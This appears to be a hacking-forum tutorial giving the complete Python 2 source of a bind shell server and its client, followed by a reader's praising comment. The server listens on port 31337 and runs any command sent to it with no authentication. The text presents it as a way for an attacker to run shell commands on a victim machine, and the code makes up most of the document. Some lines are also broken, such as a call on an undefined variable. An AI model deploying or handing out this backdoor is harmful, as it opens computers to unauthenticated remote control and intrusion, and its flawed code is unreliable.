“Bind Shell” is often used to describe a piece of program or Shell Code which bind's to a specific port on the machine and provides access to other machines (i.e attacker) to connect and execute shell commands on the victim machine. In this article we'll be looking at a basic implementation of Bind Shell and Client coded in python. The Code The Code structure is distributed to a set of files , server.py and client.py . Server The server.py program simply listens on the specified port (default : 31337) , and Provides “Shell” access to the connected machines. Code: #!/usr/bin/env python # Server import sys import socket import os host = ''; SIZE = 512; try : port = sys.argv[1]; except : port = 31337; try : sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM); except socket.error , e : print "Error in creating socket : ",e ; sys.exit(1); sockfd.setsockopt(socket.SOL_SOCKET , socket.SO_REUSEADDR , 1); try : sockfd.bind((host,port)); except socket.error , e : print "Error in Binding : ",e; sys.exit(1); print("\n\n======================================================"); print("-------- Server Listening on Port %d --------------" % port); print("======================================================\n\n"); try : while 1 : # listen for connections sockfd.listen(1); clientsock , clientaddr = sockfd.accept(); print("\n\nGot Connection from " + str(clientaddr)); while 1 : try : cmd = clientsock.recv(SIZE); except : break; pipe = os.popen(cmd); rawOutput = pipe.readlines(); print(cmd); if cmd == 'g2g': # close the connection and move on for others print("\n-----------Connection Closed----------------"); clientsock.shutdown(); break; try : output = ""; # Parse the output from list to string for data in rawOutput : output = output+data; clientsock.send("Command Output :- \n"+output+"\r\n"); except socket.error , e : print("\n-----------Connection Closed--------"); clientsock.close(); break; except KeyboardInterrupt : print("\n\n>>>> Server Terminated <<<<<\n"); print("==========================================================="); print("\tThanks for using Simple-CMD"); print("\tEmail : lionaneesh@gmail.com"); print("============================================================"); Client The client.py program connects to the server and sends the commands to be executed. Code: #!/usr/bin/env python # Simple network client import socket; import sys; port = 31337; # The port to listen on is hardcoded , if you bare changing this change the same of the server SIZE = 1000; try : host = sys.argv[1]; except : # Add localhost as the server if no host provided host = "127.0.0.1"; try : sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM); except socket.error , e : print "Error while Creating socket : ",e ; sys.exit(1); try : sockfd.connect((host,port)); except socket.gaierror , e : print "Error (Address-Related) while Connecting to server : ",e ; except socket.error , e : print "Error while Connecting to Server : ",e; sys.exit(1); # We are connected now , Start the real shit! print("============================================================="); print("\tSimple-CMD\tC0d3d by : 1i0n4n33sh"); print("============================================================="); print("\t\tEmail : lionaneesh@gmail.com"); print("============================================================="); print("\tC0d3 f0r InDi4 , H4(k F0r 1nDi4 , Liv3 f0r 1nDi4"); print("============================================================="); try : while 1: cmd = raw_input("\n\n(simple-cmd) $ "); sockfd.send(cmd); result = sockfd.recv(SIZE).strip(); if not len(result) : fd.close(); sockfd.close(); break; print(result); except KeyboardInterrupt : #clean up code sockfd.shutdown(0); print("\n\n-------- Client Terminated ----------\n"); print("\n=================================================="); print("\tThanks for using Simple-CMD"); print("\tEmail : lionaneesh@gmail.com"); print("====================================================\n\n"); That's it for this article stay tuned for more.
This is really good, I think I wouldn't do it as good as you man ! It looks pretty similarly to the way I wrote it in C++ a long time ago. Really awesome tutorial ! Keep it goin'